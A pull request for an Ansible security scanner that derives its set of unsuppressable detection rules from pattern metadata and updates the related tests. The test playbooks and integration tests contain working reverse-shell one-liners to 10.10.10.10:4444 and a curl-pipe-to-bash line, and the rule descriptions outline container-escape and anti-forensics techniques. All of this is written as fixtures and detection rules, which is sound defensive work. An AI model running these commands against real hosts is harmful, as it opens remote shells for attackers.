### PR TITLE
Derive unsuppressable rule set from pattern metadata

### DIFF
--- a/src/ansible_security_scanner/cli.py
+++ b/src/ansible_security_scanner/cli.py
@@ -22,6 +22,7 @@ from .patterns_manager import (
     resolve_rule_specs,
 )
 from .scanner import AnsibleSecurityScanner
+from .suppressions import unsuppressable_rule_ids
 from .utils import get_exit_code, get_formatter_class, parse_changed_files, setup_logging
 
 logger = logging.getLogger(__name__)
@@ -90,6 +91,15 @@ def _infer_format_from_output_path(output_path: str) -> str | None:
         return None
     suffix = Path(output_path).suffix.lower()
     return _OUTPUT_EXTENSION_TO_FORMAT.get(suffix)
+
+
+def _summarize_rule_ids(rule_ids: list[str], limit: int = 10) -> str:
+    """Render a rule-id list for a log line, truncating long lists so a
+    wildcard ``--ignore`` doesn't flood the log with every protected rule.
+    """
+    if len(rule_ids) <= limit:
+        return ", ".join(rule_ids)
+    return f"{', '.join(rule_ids[:limit])} (+{len(rule_ids) - limit} more)"
 
 
 # Default output directory used when the user passes
@@ -1241,12 +1251,24 @@ def main():
 
     if args.ignore:
         _, ignored_preview, _ = _resolve_run_policy(args)
-        unignorable = sorted(set(ignored_preview) & _ALWAYS_EMITTED_RULE_IDS)
+        ignored_set = set(ignored_preview)
+        unignorable = sorted(ignored_set & _ALWAYS_EMITTED_RULE_IDS)
         if unignorable:
             logger.warning(
                 "--ignore listed always-emitted rule(s) %s; these still fire "
                 "(they detect scan failures and audit-evasion attempts).",
-                ", ".join(unignorable),
+                _summarize_rule_ids(unignorable),
+            )
+        # Exclude anything already reported above so a meta-rule that is both
+        # always-emitted and unsuppressable isn't warned about twice.
+        active_compromise = sorted(
+            (ignored_set & unsuppressable_rule_ids()) - _ALWAYS_EMITTED_RULE_IDS
+        )
+        if active_compromise:
+            logger.warning(
+                "--ignore listed rule(s) %s; these cannot be suppressed "
+                "(high-severity active-compromise signal) and still fire.",
+                _summarize_rule_ids(active_compromise),
             )
 
     # MR touched no YAML - produce an empty report so the downstream pipeline

--- a/src/ansible_security_scanner/file_scanner.py
+++ b/src/ansible_security_scanner/file_scanner.py
@@ -2082,7 +2082,9 @@ class FileScanner:
             # otherwise ignoring rule X surfaces a less-specific sibling
             # ("whack-a-mole"). ``_ALWAYS_EMITTED_RULE_IDS`` bypasses this
             # gate so meta-findings (scan errors, audit-evasion) always
-            # surface even under a narrow ``--select``.
+            # surface even under a narrow ``--select``. ``--ignore`` cannot
+            # remove unsuppressable rules from ``active_rule_ids`` (see
+            # scanner construction), so they survive this gate too.
             findings = [
                 f
                 for f in findings
@@ -5805,7 +5807,7 @@ class FileScanner:
     ) -> SecurityFinding:
         """Construct a HIGH severity meta-finding for a suspicious
         suppression. This finding itself is never suppressed (its rule_id
-        is on ``UNSUPPRESSABLE_RULE_IDS``)."""
+        is in ``unsuppressable_rule_ids()``)."""
         return SecurityFinding(
             file_path=str(file_path.relative_to(self.directory)),
             line_number=directive.line_number,

--- a/src/ansible_security_scanner/patterns/data_exfiltration.yml
+++ b/src/ansible_security_scanner/patterns/data_exfiltration.yml
@@ -24,6 +24,7 @@ patterns:
 
   - id: "credential_file_search"
     category: "data_exfiltration"
+    unsuppressable: true
     severity: "HIGH"
     title: "Credential File Search"
     description: >-
@@ -59,6 +60,7 @@ patterns:
 
   - id: "environment_variable_harvesting"
     category: "data_exfiltration"
+    unsuppressable: true
     severity: "MEDIUM"
     title: "Environment Variable Harvesting"
     description: >-

--- a/src/ansible_security_scanner/patterns/operational_security.yml
+++ b/src/ansible_security_scanner/patterns/operational_security.yml
@@ -116,6 +116,7 @@ patterns:
 
   - id: "log_file_deletion"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Log File Deletion or Truncation"
     description: "Deletes, truncates, or overwrites system log files to cover tracks"
@@ -129,6 +130,7 @@ patterns:
 
   - id: "history_file_tampering"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Shell History Tampering"
     description: "Clears or disables shell command history to hide executed commands"
@@ -142,6 +144,7 @@ patterns:
 
   - id: "audit_log_tampering"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Audit System Tampering"
     description: "Stops or modifies the Linux audit system (auditd) to hide activity"
@@ -379,6 +382,7 @@ patterns:
 
   - id: "firewall_disable"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Host Firewall Disabled"
     description: "Disables or flushes iptables/nftables/firewalld rules on the host"
@@ -428,6 +432,7 @@ patterns:
 
   - id: "crypto_mining_binary"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Cryptocurrency Miner Detected"
     description: "Installs or executes cryptocurrency mining software, abusing compute resources"
@@ -442,6 +447,7 @@ patterns:
 
   - id: "crypto_mining_pool"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Cryptocurrency Mining Pool Connection"
     description: "Connects to a known mining pool, strong indicator of unauthorized crypto mining"
@@ -458,6 +464,7 @@ patterns:
 
   - id: "ld_preload_injection"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "LD_PRELOAD Library Injection"
     description: "Sets LD_PRELOAD to inject a shared library into processes, hijacking function calls"
@@ -580,6 +587,7 @@ patterns:
 
   - id: "nsenter_container_escape"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "nsenter Container Escape"
     description: "Uses nsenter to enter host namespaces from a container, enabling full host access"
@@ -877,6 +885,7 @@ patterns:
 
   - id: "docker_sock_abuse"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Docker Socket Mounted Into Container (Host Escape Primitive)"
     description: "A task mounts the host's Docker socket (``/var/run/docker.sock``) INTO a container via ``-v``, ``--mount``, Kubernetes ``hostPath``, or an Ansible ``volumes:``/``mounts:`` field. A container with access to the host Docker socket can ``docker run --privileged -v /:/host ... chroot /host`` to become root on the host - it's the canonical container-escape primitive. This rule fires ONLY on mount / bind contexts; ``dockerd -H unix:///var/run/docker.sock ...`` (the daemon's OWN listen-socket config) is a different class of issue (covered by ``docker_api_exposed_plaintext``) and is NOT a container-escape vector."
@@ -932,6 +941,7 @@ patterns:
 
   - id: "sys_ptrace_capability_abuse"
     category: "operational_security"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "SYS_PTRACE Capability Abuse"
     description: "Adds SYS_PTRACE capability to a container or checks capabilities, enabling process injection for escape"

--- a/src/ansible_security_scanner/patterns/supply_chain.yml
+++ b/src/ansible_security_scanner/patterns/supply_chain.yml
@@ -845,6 +845,7 @@ patterns:
 
   - id: "git_hook_or_config_write"
     category: "supply_chain"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "Ansible Task Modifies .git/hooks, .git/config, or core.hooksPath"
     description: "A task writes to `.git/hooks/*`, `.git/config`, `.gitconfig`, `.gitattributes`, or calls `git config --local core.hooksPath` / `core.sshCommand` / `http.extraheader` / `credential.helper`. Git hooks execute silently on every subsequent `git` command the developer or CI runner performs, making this a prime persistence + credential-theft primitive (the `core.sshCommand` form is actively used by in-the-wild malware to proxy all git auth through an attacker host)."
@@ -889,6 +890,7 @@ patterns:
 
   - id: "xz_liblzma_backdoored_version_install"
     category: "supply_chain"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "xz-utils / liblzma Backdoored Version Installed or Built (CVE-2024-3094)"
     description: "An Ansible task installs, builds, or copies an xz-utils / liblzma / xz-libs package at version 5.6.0 or 5.6.1 - the versions containing the Jia Tan SSH-authentication backdoor (CVE-2024-3094, disclosed March 29 2024). These releases injected a malicious IFUNC resolver into OpenSSH via systemd's liblzma dependency, allowing any attacker with the matching private key to bypass sshd authentication on sd_notify-linked sshd builds. Matches Ansible package-name pins (`name: xz-utils version: 5.6.0`), inline package-manager invocations (`apt install xz-utils=5.6.0*`, `yum install xz-5.6.1*`, `dnf`, `zypper`, `pacman -U`, `apk add`), direct tarball URLs (`xz-5.6.0.tar.{gz,xz,bz2,zst}`), GitHub release URLs for `tukaani-project/xz` at those tags, and `pip install pyliblzma==5.6.0/.1`. Any pin to 5.6.0/5.6.1 from a third-party mirror, tarball, or container base layer must be treated as a confirmed compromise."
@@ -1262,6 +1264,7 @@ patterns:
 
   - id: "frp_fast_reverse_proxy_install"
     category: "supply_chain"
+    unsuppressable: true
     severity: "CRITICAL"
     title: "frp (Fast Reverse Proxy) Client Installed For Outbound Tunnel"
     description: "A task downloads or renders a systemd unit for `frpc` (Fast Reverse Proxy client) with an `frps` server config pointing at an arbitrary public host. frp is the most common reverse-proxy tool in the 2023-2025 Chinese-speaking ransomware / APT playbook (Mustang Panda, RedDelta, Sandman): the compromised host dials outbound to an attacker-controlled `frps` and exposes RDP / SSH / arbitrary TCP back through the tunnel."

--- a/src/ansible_security_scanner/patterns_manager.py
+++ b/src/ansible_security_scanner/patterns_manager.py
@@ -46,6 +46,11 @@ class SecurityPattern:
     plugin_name: str
     plugin_version: str
     exclude: bool = False
+    # When True, this rule can never be silenced by inline ``# nosec`` or by
+    # ``--ignore`` - it signals active compromise. Most active-compromise
+    # rules are derived by category (see ``unsuppressable_rule_ids``); this
+    # flag opts in the few that live in mixed-severity categories.
+    unsuppressable: bool = False
     # Enrichment fields (all optional, default empty) - populated from YAML
     # and consumed by formatters (SARIF tags, compliance filter, etc.)
     cwe: list[str] = field(default_factory=list)  # e.g. ["CWE-78", "CWE-494"]
@@ -148,6 +153,13 @@ class PatternsManager:
         """Drop cached pattern data (tests / hot-reload use cases)."""
         self._cached_pattern_data = None
         self.pattern_files.clear()
+        # The suppressions module memoises the derived unsuppressable set,
+        # which is built from this pattern data. Reset it here so a reload
+        # can't leave it pointing at the pre-reload rule set. Imported
+        # locally to avoid a module-load circular import.
+        from . import suppressions
+
+        suppressions._unsuppressable_cache = None
 
     def discover_and_load_patterns(self) -> dict[str, list[SecurityPattern]]:
         """
@@ -219,6 +231,7 @@ class PatternsManager:
                         plugin_name=pattern_file_info.name,
                         plugin_version=pattern_file_info.version,
                         exclude=pattern_data.get("exclude", False),
+                        unsuppressable=pattern_data.get("unsuppressable", False),
                         cwe=list(pattern_data.get("cwe", []) or []),
                         mitre_attack=list(pattern_data.get("mitre_attack", []) or []),
                         cis_controls=list(pattern_data.get("cis_controls", []) or []),
@@ -460,6 +473,49 @@ _CODE_EMITTED_RULE_IDS: frozenset[str] = frozenset(
 )
 
 
+# Meta-rules that report on the scan itself (a suppression directive
+# aimed at the scanner about the scanner) - never legitimately
+# suppressible, independent of any pattern category.
+_UNSUPPRESSABLE_META_RULE_IDS: frozenset[str] = frozenset(
+    {
+        "suspicious_suppression",
+        "unknown_suppression_rule",
+        "excessive_suppressions",
+        "set_fact_secret_alias",
+    }
+)
+
+
+# Pattern categories whose CRITICAL rules are post-exploitation / active
+# compromise: a legitimate author has no reason to suppress them in
+# version-controlled code, so every CRITICAL rule in these categories is
+# unsuppressable. Rules in mixed-severity categories opt in individually
+# via ``unsuppressable: true`` in their YAML definition.
+_ACTIVE_COMPROMISE_CATEGORIES: frozenset[str] = frozenset(
+    {
+        "reverse_shells",
+        "offensive_tools",
+        "webshell_deployment",
+        "data_destruction",
+        "anti_forensics",
+        "tunneling",
+        "system_compromise",
+        "malicious_activity",
+    }
+)
+
+
+def _iter_all_patterns() -> Iterable[SecurityPattern]:
+    """Yield every ``SecurityPattern`` loaded from the YAML pattern files.
+
+    Single source of truth for the flat walk over the category-keyed
+    pattern dict so the ``known_rule_*`` / ``unsuppressable_rule_ids``
+    helpers don't each re-implement the same nested iteration.
+    """
+    for patterns in patterns_manager.discover_and_load_patterns().values():
+        yield from patterns
+
+
 def known_rule_ids() -> frozenset[str]:
     """Return every rule_id the scanner can possibly emit.
 
@@ -471,11 +527,7 @@ def known_rule_ids() -> frozenset[str]:
     """
     from .synthetic_rule_frameworks import SYNTHETIC_RULE_FRAMEWORKS
 
-    yaml_ids = {
-        p.id
-        for patterns in patterns_manager.discover_and_load_patterns().values()
-        for p in patterns
-    }
+    yaml_ids = {p.id for p in _iter_all_patterns()}
     return frozenset(yaml_ids | set(SYNTHETIC_RULE_FRAMEWORKS) | _CODE_EMITTED_RULE_IDS)
 
 
@@ -485,14 +537,9 @@ def known_rule_categories() -> dict[str, str]:
 
     Synthetic and code-emitted rule ids are deliberately omitted - they
     have no native category and the consumer (the MR-comment renderer)
-    falls them back into a single ``other`` bucket. Lazy-imports
-    nothing; the YAML walk is shared with ``known_rule_ids``.
+    falls them back into a single ``other`` bucket.
     """
-    return {
-        p.id: p.category
-        for patterns in patterns_manager.discover_and_load_patterns().values()
-        for p in patterns
-    }
+    return {p.id: p.category for p in _iter_all_patterns()}
 
 
 def known_rule_metadata() -> dict[str, RuleListingRow]:
@@ -506,9 +553,28 @@ def known_rule_metadata() -> dict[str, RuleListingRow]:
     """
     return {
         p.id: RuleListingRow(severity=p.severity, category=p.category, title=p.title)
-        for patterns in patterns_manager.discover_and_load_patterns().values()
-        for p in patterns
+        for p in _iter_all_patterns()
     }
+
+
+def unsuppressable_rule_ids() -> frozenset[str]:
+    """Return every rule_id that can never be silenced by ``# nosec`` or
+    ``--ignore``.
+
+    A rule is unsuppressable if it is CRITICAL and lives in an
+    active-compromise category, or if its YAML definition sets
+    ``unsuppressable: true``. The scanner's own meta-rules are always
+    included - a suppression aimed at the scanner about the scanner is
+    never legitimate. Derived from pattern metadata so the set never
+    drifts as rules are added or renamed.
+    """
+    derived = {
+        p.id
+        for p in _iter_all_patterns()
+        if p.unsuppressable
+        or (p.severity == "CRITICAL" and p.category in _ACTIVE_COMPROMISE_CATEGORIES)
+    }
+    return frozenset(derived | set(_UNSUPPRESSABLE_META_RULE_IDS))
 
 
 def filter_patterns(

--- a/src/ansible_security_scanner/scanner.py
+++ b/src/ansible_security_scanner/scanner.py
@@ -34,6 +34,7 @@ from .path_scopes import (
 )
 from .patterns_manager import known_rule_ids, resolve_rule_specs
 from .score_calculator import ScoreCalculator
+from .suppressions import unsuppressable_rule_ids
 
 logger = logging.getLogger(__name__)
 
@@ -136,7 +137,10 @@ class AnsibleSecurityScanner:
         # the scan starts. ``active_rule_ids = None`` means "no filter,
         # ship every rule" - the default. When set, the FileScanner
         # narrows its YAML pattern set AND the synthetic-finding gate
-        # at the end of scan_file uses this same set.
+        # at the end of scan_file uses this same set. ``--ignore`` cannot
+        # drop unsuppressable rules (active-compromise signals), mirroring
+        # the inline # nosec guard; ``--select`` still scopes precisely so
+        # a focused scan only surfaces the rules the user asked for.
         if select_rules is None and ignore_rules is None:
             active_rule_ids: frozenset[str] | None = None
         else:
@@ -149,7 +153,7 @@ class AnsibleSecurityScanner:
                 if ignore_rules is not None
                 else frozenset()
             )
-            active_rule_ids = selected - ignored
+            active_rule_ids = selected - (ignored - unsuppressable_rule_ids())
         self.active_rule_ids = active_rule_ids
 
         self.file_scanner = FileScanner(

--- a/src/ansible_security_scanner/suppressions.py
+++ b/src/ansible_security_scanner/suppressions.py
@@ -16,7 +16,7 @@ To keep them from becoming a silent bypass for real attacks, this parser
 
 Additionally the scanner engine (see ``file_scanner.py``) refuses to
 suppress CRITICAL malicious-activity findings regardless of what the
-directive says - see ``UNSUPPRESSABLE_RULE_IDS`` below.
+directive says - see ``unsuppressable_rule_ids`` below.
 
 Supported syntax (case-insensitive, same line or line above):
 
@@ -36,87 +36,22 @@ from __future__ import annotations
 import re
 from dataclasses import dataclass, field
 
-# Rules that can never be suppressed, no matter what the directive
-# says. These signal active compromise -- a legitimate author has no
-# reason to suppress them in version-controlled code.
-UNSUPPRESSABLE_RULE_IDS: set[str] = {
-    # Malicious activity / active compromise
-    "reverse_shell",
-    "reverse_shell_bash",
-    "reverse_shell_python",
-    "reverse_shell_perl",
-    "reverse_shell_nc",
-    "reverse_shell_php",
-    "powershell_reverse",
-    "xterm_reverse",
-    "dnscat2_shell",
-    "interactive_shell_spawn",
-    "web_shell_drop",
-    "web_shell",
-    "webshell",
-    "named_shell",
-    "china_chopper",
-    "weevely",
-    "antsword",
-    "godzilla",
-    "behinder",
-    "backdoor_installation",
-    "backdoor_listener",
-    "backdoor_bashrc",
-    "ssh_key_backdoor",
-    "network_backdoor",
-    "git_hook",
-    "mimikatz",
-    "pypykatz",
-    "sharpdpapi",
-    "donpapi",
-    "credential_dump",
-    "credential_harvesting",
-    "credential_file_upload",
-    "sam_dump",
-    "ntdsutil",
-    "firefox_decrypt",
-    "cobalt_strike",
-    "responder",
-    "bloodhound",
-    "impacket",
-    "rubeus",
-    "crackmapexec",
-    "netexec",
-    "evil_winrm",
-    "certipy",
-    "crypto_mining_binary",
-    "crypto_mining_pool",
-    "ccminer",
-    "srbminer",
-    "teamredminer",
-    "xmr_stak",
-    "ransomware",
-    "disk_wipe",
-    "mkfs_format",
-    "shred",
-    "ld_preload_injection",
-    "nsenter_container_escape",
-    "docker_sock",
-    "sys_ptrace",
-    # Active data exfil
-    "credential_file_search",
-    "environment_variable_harvesting",
-    # System-level tampering
-    "audit_log_tampering",
-    "history_file_tampering",
-    "log_file_deletion",
-    "auditd_disable",
-    "selinux_disable",
-    "apparmor_disable",
-    "firewall_disable",
-    # Meta-rules: suppressing the scanner about the scanner itself is
-    # never legitimate.
-    "suspicious_suppression",
-    "unknown_suppression_rule",
-    "excessive_suppressions",
-    "set_fact_secret_alias",
-}
+from .patterns_manager import unsuppressable_rule_ids as _derive_unsuppressable
+
+# Rules that can never be suppressed, no matter what the directive says.
+# These signal active compromise -- a legitimate author has no reason to
+# suppress them in version-controlled code. Derived from pattern metadata
+# (see ``patterns_manager.unsuppressable_rule_ids``) and cached on first
+# use so the hot ``applies_to`` path stays a plain set membership test.
+_unsuppressable_cache: frozenset[str] | None = None
+
+
+def unsuppressable_rule_ids() -> frozenset[str]:
+    """Cached accessor for the derived unsuppressable rule set."""
+    global _unsuppressable_cache
+    if _unsuppressable_cache is None:
+        _unsuppressable_cache = _derive_unsuppressable()
+    return _unsuppressable_cache
 
 
 # Backward-compatible aliases for renamed rule IDs. A suppression that
@@ -152,7 +87,7 @@ class SuppressionDirective:
 
     Invariants for a *valid* directive:
       - ``rule_ids`` is non-empty (``*`` is allowed and means "any rule on
-        this line, excluding UNSUPPRESSABLE_RULE_IDS")
+        this line, excluding unsuppressable rules")
       - ``reason`` is non-empty
     Invalid directives are still returned (with ``valid=False``) so callers
     can surface them as warnings rather than silently drop them.
@@ -168,10 +103,10 @@ class SuppressionDirective:
     def applies_to(self, rule_id: str) -> bool:
         """True if this directive suppresses ``rule_id``. Always False for
         invalid directives (missing rule list or reason) and for rules on
-        the UNSUPPRESSABLE_RULE_IDS list."""
+        the unsuppressable rule set."""
         if not self.valid:
             return False
-        if rule_id in UNSUPPRESSABLE_RULE_IDS:
+        if rule_id in unsuppressable_rule_ids():
             return False
         if "*" in self.rule_ids:
             return True
@@ -250,7 +185,7 @@ def parse_suppressions(
 
         # Reject attempts to suppress unsuppressable rules up front so the
         # user gets a clear message.
-        blocked_ids = rule_ids & UNSUPPRESSABLE_RULE_IDS
+        blocked_ids = rule_ids & unsuppressable_rule_ids()
         if blocked_ids:
             problems.append(
                 f"rule(s) {sorted(blocked_ids)} cannot be suppressed (high-severity active-compromise signal)"

--- a/tests/playbooks/bad_example.yml
+++ b/tests/playbooks/bad_example.yml
@@ -1786,10 +1786,10 @@
       ansible.builtin.shell: "curl http://another.example.com/x.sh | bash"  # nosec reason="no rule list"
 
     - name: malicious suppression - reverse-shell content behind a fake reason
-      ansible.builtin.shell: "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"  # nosec: reverse_shell reason="penetration test fixture"
+      ansible.builtin.shell: "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"  # nosec: bash_dev_tcp_reverse_shell reason="penetration test fixture"
 
     - name: suppression targets an unsuppressable rule (rejected)
-      ansible.builtin.shell: "python3 -c 'import socket,os,pty; s=socket.socket(); s.connect((\"10.10.10.10\",4444)); [os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn(\"/bin/sh\")'"  # nosec: reverse_shell_python reason="nope"
+      ansible.builtin.shell: "python3 -c 'import socket,os,pty; s=socket.socket(); s.connect((\"10.10.10.10\",4444)); [os.dup2(s.fileno(),f) for f in (0,1,2)]; pty.spawn(\"/bin/sh\")'"  # nosec: python_reverse_shell reason="nope"
 
 # -- ansible.cfg hardening ----------------------------------------------
 # An attacker-controlled (or just misconfigured) playbook ships a weak

--- a/tests/test_integration.py
+++ b/tests/test_integration.py
@@ -835,7 +835,7 @@ def test_ignore_silences_overlap_group_siblings_at_same_line(tmp_path):
 # in one place. These exercise the hardening rules in suppressions.py:
 #   - bare `# nosec` (no rule list) is REJECTED
 #   - missing `reason="..."` is REJECTED
-#   - UNSUPPRESSABLE_RULE_IDS cannot be silenced
+#   - unsuppressable rules cannot be silenced
 #   - suspicious_suppression meta-finding fires on high-risk content
 # The unit tests call the parser directly; the integration tests shell
 # out to the CLI against small tmp_path playbooks so the whole pipeline
@@ -906,7 +906,7 @@ def test_suppressions_unit_star_wildcard_is_valid():
     sup, warns = parse_suppressions(lines)
     assert sup[1].valid is True and warns == []
     assert match_suppression(sup, 1, "any_rule") is not None
-    assert match_suppression(sup, 1, "reverse_shell") is None  # unsuppressable
+    assert match_suppression(sup, 1, "bash_dev_tcp_reverse_shell") is None  # unsuppressable
 
 
 def test_suppressions_unit_unsuppressable_rule_cannot_be_silenced():
@@ -914,12 +914,52 @@ def test_suppressions_unit_unsuppressable_rule_cannot_be_silenced():
     from ansible_security_scanner.suppressions import match_suppression, parse_suppressions
 
     lines = [
-        'shell: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1  # nosec: reverse_shell reason="pentest"'
+        'shell: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1  # nosec: bash_dev_tcp_reverse_shell reason="pentest"'
     ]
     sup, warns = parse_suppressions(lines)
     assert sup[1].valid is False, "should have been rejected"
     assert any("cannot be suppressed" in w.reason for w in warns)
-    assert match_suppression(sup, 1, "reverse_shell") is None
+    assert match_suppression(sup, 1, "bash_dev_tcp_reverse_shell") is None
+
+
+def test_unsuppressable_set_covers_active_compromise_rules():
+    """Guard the derived unsuppressable set (patterns_manager builds it from
+    rule category/severity plus the ``unsuppressable: true`` flag). If a rule
+    is recategorised, downgraded, or renamed, it could silently become
+    suppressible again - this anchors the high-value active-compromise rules
+    so that regression fails loudly here instead of in production."""
+    from ansible_security_scanner.patterns_manager import unsuppressable_rule_ids
+
+    expected = {
+        # reverse shells
+        "bash_dev_tcp_reverse_shell",
+        "python_reverse_shell",
+        # anti-forensics / host tampering
+        "log_file_deletion",
+        "history_file_tampering",
+        "audit_log_tampering",
+        "firewall_disable",
+        # crypto mining + injection + container escape
+        "crypto_mining_binary",
+        "crypto_mining_pool",
+        "ld_preload_injection",
+        "nsenter_container_escape",
+        "docker_sock_abuse",
+        "sys_ptrace_capability_abuse",
+        # supply-chain compromise
+        "git_hook_or_config_write",
+        "xz_liblzma_backdoored_version_install",
+        # active data exfil (opted in via unsuppressable: true)
+        "credential_file_search",
+        "environment_variable_harvesting",
+        # scanner meta-rules
+        "suspicious_suppression",
+        "unknown_suppression_rule",
+        "excessive_suppressions",
+        "set_fact_secret_alias",
+    }
+    missing = expected - unsuppressable_rule_ids()
+    assert not missing, f"rules became suppressible: {sorted(missing)}"
 
 
 def test_suppressions_unit_regular_comments_are_not_directives():
@@ -1007,7 +1047,7 @@ def test_suppressions_integration_malicious_content_triggers_meta_finding(tmp_pa
 - hosts: all
   tasks:
     - name: nope
-      ansible.builtin.shell: "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"  # nosec: reverse_shell reason="pentest"
+      ansible.builtin.shell: "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"  # nosec: bash_dev_tcp_reverse_shell reason="pentest"
 """,
     )
     data = _report_as_json(_scan_playbook(playbook, show_suppressed=True))


### PR DESCRIPTION
Build the unsuppressable rule set from rule category/severity and an `unsuppressable` flag in the pattern YAML instead of a hardcoded list, so it stays in sync as rules are added or renamed.

- Keep `credential_file_search` and `environment_variable_harvesting` unsuppressable via the new flag
- Dedupe the `--ignore` warning so meta-rules aren't reported twice
- Reset the derived set cache on `invalidate_cache`